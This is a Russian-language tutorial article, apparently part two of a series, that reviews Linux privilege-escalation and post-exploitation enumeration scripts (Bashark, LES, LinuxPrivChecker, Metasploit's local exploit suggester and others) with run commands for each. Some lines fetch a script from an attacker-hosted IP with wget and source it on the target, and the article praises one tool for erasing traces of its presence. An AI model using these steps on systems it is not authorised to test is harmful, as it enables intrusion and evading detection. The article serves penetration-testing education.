Повышение привилегий в Linux. Скрипт. Часть 2
Life-Hack [Жизнь-Взлом]/ХакингСсылка: Bashark
Настало время поработать с Bashark. Он был создан компанией RedCode Labs. Bashark был разработан для оказания помощи тестировщикам на проникновение и исследователям безопасности на этапе пост-эксплуатации и оценки безопасности сервера на базе Linux, OSX или Solaris.
Некоторые из выдающихся особенностей Bashark заключаются в том, что это bash-скрипт, что означает, что он может быть запущен непосредственно из терминала без какой-либо установки. Он быстр и не перегружает целевую машину. Bashark не имеет каких-либо конкретных зависимостей, которые вам потребовались бы для установки. Поскольку он стирает данные о своем присутствии после выполнения работы, его трудно обнаружить. Пользователь скачал Bashark с помощью команды «wget», которая локально размещена на машине злоумышленника. Затем он предоставил ему разрешения на выполнение с помощью команды «chmod» и запустил сам скрипт. Скрипт обновляет ваш Shell, чтобы иметь возможность выполнять различные команды.
cd /tmp wget 192.168.1.5/bashark.sh chmod 777 bashark.sh source bashark.sh

Здесь пользователь использовал команду «getperm-c» для чтения битов SUID на nano, cp и find среди других двоичных файлов. Bashark также перечислил все общие пути к конфигурационным файлам с помощью команды «getconf».
getperm -c getconf

LES: Linux Exploit Suggester
Ссылка: LES
Пришло время поговорить о LES. Он был создан компанией Z-Labs. Как и другие скрипты в этой статье, он также был разработан, чтобы помочь тестировщикам безопасности и аналитикам проверить машину Linux на наличие потенциальных уязвимостей и возможности повышения привилегий. LES создан таким образом, что он может работать на разных версиях или сборках Linux. Обширные исследования привели к усовершенствованию этого инструмента и сделали его надежным, с минимальным количеством ложных срабатываний. Основная работа LES начинается с создания первоначального списка эксплойтов на основе обнаруженной версии ядра. Затем он проверяет наличие определенных тегов для каждого эксплойта. LES показывает все полученные результаты, ранжируя их в соответствии с уровнем потенциального риска. Видно, что целевая машина имеет уязвимости CVE 2021-3156, CVE 2018-18955, CVE 2019-18634, CVE, 2019-15666, CVE 2017-0358. Пользователь может почитать о них и использовать полученную информацию для повышения привилегий на целевой машине.
chmod 777 les.sh ./les.sh

LinuxPrivChecker
Ссылка: LinuxPrivChecker
Проверка некоторых Privs с помощью LinuxPrivChecker. Он был создан Mike Czumak и сейчас его работа поддерживается Michael Contino. После связки скриптов Shell нужно сосредоточиться на скрипте python. Этот скрипт python направлен на повышение привилегий в Linux. Он ищет доступные для записи файлы, неправильные конфигурации и пароли, хранящиеся в виде открытого текста, а также возможные эксплойты. Скрипт также показывает «интересные» локации, которые могут играть ключевую роль при повышении привилегий. Все начинается со сбора базовой информации о системе. У пользователя есть данные о версии ядра, имени хоста, ОС, сети, активных службах.
python linuxprivchecker.py

LinuxPrivChecker также проверяет файл /etc/passwd/ и ищет такую информацию, как данные о группе и ее разрешениях на запись.

Metasploit: Local_Exploit_Suggester
Люди, которые не любят скрипты или те, кто использует Metasploit для повышения привилегий в целевой системе, иногда завершают работу сеансом Meterpreter. Таким образом, у них есть модуль пост-эксплуатации, который можно использовать для проверки других способов повышения привилегий. Все, что требуется, — это номер идентификатора сеанса для запуска на целевой машине. Будут перечислены различные уязвимости, которыми обладает система.
use post/multi/recon/local_exploit_suggester set session 2 exploit

Linux Private-i
Ссылка: Linux Private-i
Проверка некоторых Privs с помощью LinuxPrivChecker. Он был создан creosote. Linux Private-i можно считать инструментом для перечисления файлов в Linux и повышения привилегий. Он выполняет основные шаги по перечислению и показывает пользователю результаты данного процесса в легко читаемом формате. Скрипт включает в себя жизненно важные проверки, такие как информация об ОС и разрешения файлов, возможные учетные данные пользователей, программы: Apache/HTTPD, Tomcat, Netcat, Perl, Ruby, Python, WordPress, Samba; приложения баз данных: SQLite, Postgres, MySQL/MariaDB, MongoDB, Oracle, Redis, CouchDB; почтовые приложения: Postfix, Dovecot, Exim, Squirrel Mail, Cyrus, Sendmail, Courier; проверки информации о сети – netstat, ifconfig. Вот фрагмент кода при запуске полного сканирования. Видно, что целевая машина имеет файл /etc/passwd, доступный для записи. Кроме того, Netcat, Perl, Python установлены на целевой машине.
chmod 777 private-i.sh ./private-i.sh

Private-i также извлек скрипт из cron job, что выполняется по истечении заданного промежутка времени.

Linux Smart Enumeration
Ссылка: Linux Smart Enumeration
Интеллектуальное перечисление файлов в Linux. Скрипт был создан Diego Blanco. Linux Smart Enumeration – это скрипт, создание которого было вдохновлено скриптом LinEnum. Его цель состоит в том же, что и у всех других упомянутых в этой статье скриптов. Этот скрипт имеет 3 уровня мощности, так что пользователь может контролировать объем информации, которую он хочет собрать. Скрипт использует цвет для различения типов предупреждений. Например, зеленый означает, что его можно использовать для повышения привилегий на целевой машине. Он проверяет группы пользователей, переменные Path, разрешения Sudo и другие «интересные» файлы.
chmod 777 lse.sh ./lse.sh

Здесь также есть файл cleanup.py.

Существуют файлы SUID, которые можно использовать для повышения привилегий, такие как nano, cp, find. Пользователь также видит, что файл /etc/passwd доступен для записи.

Linux Exploit Suggester 2
Ранее шла речь о Linux Exploit Suggester. Однако стоит взглянуть на новое поколение – Linux Exploit Suggester 2. Он в значительной степени основан на первой версии. Скрипт может загрузить обнаруженный код эксплойта непосредственно из базы данных эксплойтов. Он имеет более точное сопоставление подстановочных знаков. Это расширяет область поиска эксплойтов. И последнее нововведение, но не менее важное – он показывает результаты в определенных цветах (зеленый – возможно повышение привилегий).
chmod 777 linux-exploit-suggester-2.pl ./linux-exploit-suggester-2.pl -k 3

Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.